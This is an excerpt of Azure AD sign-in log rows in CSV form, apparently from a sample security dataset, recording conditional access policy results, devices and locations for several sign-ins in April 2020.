1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5949abe0-9b87-40bf-991e-6df759561000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,5949abe0-9b87-40bf-991e-6df759561000,SigninLogs,Sucess,50.6406517,5.572050095
+1686,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:25.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f6d03335-dc54-49ab-bc5a-4a7bd9142dcf,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",aa57d52a-288e-488c-a4a9-011b40391000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,aa57d52a-288e-488c-a4a9-011b40391000,SigninLogs,Sucess,50.6406517,5.572050095
+1687,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:24.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,96652f45-845f-458a-bae7-186037ab10da,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",23877b62-2023-4ce4-9fb4-bf654bc80f00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,23877b62-2023-4ce4-9fb4-bf654bc80f00,SigninLogs,Sucess,50.6406517,5.572050095
+1688,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:50.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c771ca39-07ac-4ee5-8316-480ede22a678,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:02,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",9a5be8ca-381f-49d5-a584-708ba66f5800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,9a5be8ca-381f-49d5-a584-708ba66f5800,SigninLogs,Sucess,38.47222137,-77.41989899
+1689,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:30.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d5b4c0b4-28e0-4aa6-a055-b23662f82d33,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",82df5368-1a8b-4fb8-b076-b0dfebfb1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,82df5368-1a8b-4fb8-b076-b0dfebfb1000,SigninLogs,Sucess,38.47222137,-77.41989899
+1690,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:19.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c771ca39-07ac-4ee5-8316-480ede22a678,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:23,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",8ba905ce-4b13-4da4-aa67-e018e6b16100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8ba905ce-4b13-4da4-aa67-e018e6b16100,SigninLogs,Sucess,38.47222137,-77.41989899
+1691,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:34.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e47880d7-0536-4cc7-b9bf-2d67d75ddfb8,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",8900d912-3d17-47c8-917b-3b4375ab1100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,8900d912-3d17-47c8-917b-3b4375ab1100,SigninLogs,Sucess,50.6406517,5.572050095
+1692,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:03.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,45d3cc24-53c2-40c2-b8d7-6129950c8390,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",87802367-3de7-42c2-ada0-d6bcda971700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,87802367-3de7-42c2-ada0-d6bcda971700,SigninLogs,Sucess,41.90428925,-85.99833679
